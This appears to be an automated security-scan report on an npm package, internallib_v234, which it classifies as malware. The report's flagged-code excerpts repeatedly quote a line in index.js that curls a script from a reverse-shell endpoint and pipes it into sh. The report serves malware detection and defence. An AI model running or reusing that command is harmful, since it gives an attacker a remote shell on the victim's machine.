internallib_v234@1.0.3

AI Security Review

scanned 5h ago · by lpm-firewall-ai

The package exposes a function that downloads a remote shell script and executes it with bash. The endpoint name and URL indicate reverse-shell behavior.

Static reason
High-risk behavior combination matched malicious policy; source fingerprint signature matched known malicious package; routed for review
Trigger
Runtime call to exports.command() or running check.js
Impact
Remote code execution and likely reverse shell on the caller host
Mechanism
curl-to-shell via child_process.exec
Attack narrative
When the package entrypoint is imported and its command() export is called, it invokes child_process.exec with a bash command that curls https://reverse-shell.sh/10.0.74.133:443 and pipes the response directly into sh. check.js shows the exported function being called. This is concrete remote code execution with a reverse-shell endpoint, though not triggered by npm install lifecycle scripts.
Rationale
Direct source inspection confirms a reachable exported function executes a remote script through bash. This is malicious remote code execution rather than a noisy scanner-only finding.
Evidence
index.js, check.js, package.json
Network endpoints (1)
reverse-shell.sh/10.0.74.133:443

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • index.js imports child_process.exec.
  • index.js exported command runs /bin/bash with curl piped to sh.
  • Remote script URL is https://reverse-shell.sh/10.0.74.133:443.
  • check.js invokes internallib.command(), demonstrating reachable execution.
  • package.json main points to index.js.
Evidence against
  • No npm lifecycle hook runs at install time.
  • Execution requires calling the exported command or running check.js.
Behavioral surface
Source: ChildProcess, Shell
Supply chain: TrivialUrlStrings
Manifest: No manifest risk signals triggered.
scanned 2 file(s), 272 B of source, external domains: reverse-shell.sh

Source & flagged code

5 flagged
index.js
L1: const { exec } = require('child_process');
L2: ...
L4: console.log("vert16x");
L5: exec('/bin/bash -c "curl https://reverse-shell.sh/10.0.74.133:443|sh"');
L6: return "deu bom";
Critical
Download Execute

Source downloads or fetches remote code and executes it.

index.js · L1
Trigger-reachable chain: manifest.main -> index.js
L1: const { exec } = require('child_process');
L2: ...
L4: console.log("vert16x");
L5: exec('/bin/bash -c "curl https://reverse-shell.sh/10.0.74.133:443|sh"');
L6: return "deu bom";
Critical
Trigger Reachable Dangerous Capability

A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.

index.js · L1
L1: const { exec } = require('child_process');
L2: ...
High
Child Process

Package source references child process execution.

index.js · L1
L4: console.log("vert16x");
L5: exec('/bin/bash -c "curl https://reverse-shell.sh/10.0.74.133:443|sh"');
L6: return "deu bom";
High
Shell

Package source references shell execution.

index.js · L4
matchType = malicious_source_fingerprint_signature
signature = 664ce3e800c949fb
signatureType = suspicious_hashes
sourceLabel = Datadog
matchedPackage = @joaoxxx/internallib-v325@1.0.7
matchedPath = index.js
matchedIdentity = npm:[redacted]:1.0.7
similarity = 1.000
shingleOverlap = 2
summary = Datadog malicious npm corpus sample: samples/npm/malicious_intent/@joaoxxx@internallib-v325/1.0.7/2026-01-09-@joaoxxx_internallib-v325-v1.0.7.zip
High
Known Malware Source Fingerprint Signature

Source fingerprint signature matches a known malicious package signature; route for source-aware review.

index.js

Findings

2 Critical · 3 High · 2 Low
Critical · Download Execute · index.js
Critical · Trigger Reachable Dangerous Capability · index.js
High · Child Process · index.js
High · Shell · index.js
High · Known Malware Source Fingerprint Signature · index.js
Low · Scripts Present
Low · Url Strings